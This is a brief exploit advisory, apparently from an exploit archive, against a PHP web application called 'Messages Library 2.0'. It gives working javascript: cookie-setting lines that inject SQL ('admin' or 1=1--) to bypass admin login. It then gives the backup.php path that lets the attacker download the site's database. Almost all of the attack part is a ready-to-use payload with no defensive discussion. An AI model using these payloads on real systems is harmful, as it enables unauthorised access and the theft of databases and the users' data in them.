Messages Library version 2.0 suffers from an insecure cookie handling and database download vulnerability.
87ab475128f3b9adb1174c92c9edfe8c58acb45ea280799335474252a74957a6
# Messages Library 2.0 <= Arbitrary Database Download Vulnerability
########################################
#[*] Founded & Exploited by : Stack
########################################
Bypass with
javascript:document.cookie = "SaphpLesson_Name=admin' or 1=1--; path=/";
javascript:document.cookie = "SaphpLesson_Password=' or 1=1--; path=/";
After Exec
http://localhost/sms/admin/backup.php
and you got the database download